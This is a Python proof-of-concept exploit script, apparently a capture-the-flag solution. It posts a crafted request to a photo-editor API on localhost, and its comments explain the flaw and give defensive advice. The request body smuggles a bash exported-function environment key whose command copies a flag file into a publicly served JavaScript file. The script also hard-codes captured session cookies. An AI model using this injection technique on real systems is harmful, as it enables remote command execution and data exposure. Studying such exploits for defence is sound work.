#!/usr/bin/env python3
from base64 import b64decode
import requests
import sys
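# NOTE(review): proof-of-concept request script. The `Parameters` payload
# below carries a `BASH_FUNC_whoami%%` key, which is the form bash uses to
# import an exported shell function from its environment; the request can
# only have an effect if the server copies request-supplied keys into the
# environment of a child bash process. Defensive takeaways for the
# application side: never pass caller-controlled names into a subprocess
# environment, allow-list environment variable names rather than filtering
# values, and treat `DynamicAction`/`Types` strings as untrusted input.

# Captured browser cookies. `_streamlit_xsrf` looks like a per-session XSRF
# token (its last field resembles a Unix timestamp); treat values like this
# as secrets and do not commit real ones.
cookies = {
    '_streamlit_xsrf': '2|9690aa7c|65f1b6483b23d4f268aaa1bc37107645|1713379145',
    'ajs_anonymous_id': '41f17fef-5f83-4be5-a144-1bcfd22fd984',
}

# Browser-like request headers. Origin and Referer are hard-coded to
# localhost:1024 even when a different base URL is passed on the command
# line, so a server-side same-origin check would see a mismatch in that case.
headers = {
    'Accept': 'application/json, text/javascript, */*; q=0.01',
    'Accept-Language': 'en-US,en;q=0.9',
    'Cache-Control': 'no-cache',
    'Connection': 'keep-alive',
    'Content-Type': 'application/json',
    'Origin': 'http://localhost:1024',
    'Pragma': 'no-cache',
    'Referer': 'http://localhost:1024/',
    'Sec-Fetch-Dest': 'empty',
    'Sec-Fetch-Mode': 'cors',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-GPC': '1',
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',
    'X-Requested-With': 'XMLHttpRequest',
    'sec-ch-ua': '"Brave";v="123", "Not:A-Brand";v="8", "Chromium";v="123"',
    'sec-ch-ua-mobile': '?0',
    'sec-ch-ua-platform': '"Linux"',
}

# The image payload is read from a local file named "b64" in the working
# directory; the original left the handle open, so read it under `with`.
# Raises FileNotFoundError if the file is absent.
with open("b64") as blob_file:
    base64_blob = blob_file.read().strip()

# Request body. `Types` looks like a .NET generic type name, which suggests
# the server deserializes `Parameters` into a Dictionary<string, string>
# — TODO confirm against the application.
json_data = {
    'Base64Blob': base64_blob,
    'DynamicAction': 'GetUsername',
    'Parameters': '[{"PATH": "/usr/bin", "BASH_FUNC_whoami%%": "() { cat /App/flag > /App/wwwroot/js/flag.js; }"}]',
    'Types': ["System.Collections.Generic.Dictionary`2[System.String,System.String]"],
}

# Optional first CLI argument overrides the target base URL.
baseurl = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:1024"

response = requests.post(
    f'{baseurl}/api/DynamicPhotoEditor/EditImage',
    cookies=cookies,
    headers=headers,
    json=json_data,
)

print(response.status_code)
print(response.text)
# Raises (ValueError / KeyError) if the body is not JSON or lacks
# "base64Blob"; the raw text has already been printed above for diagnosis.
print(b64decode(response.json()["base64Blob"]))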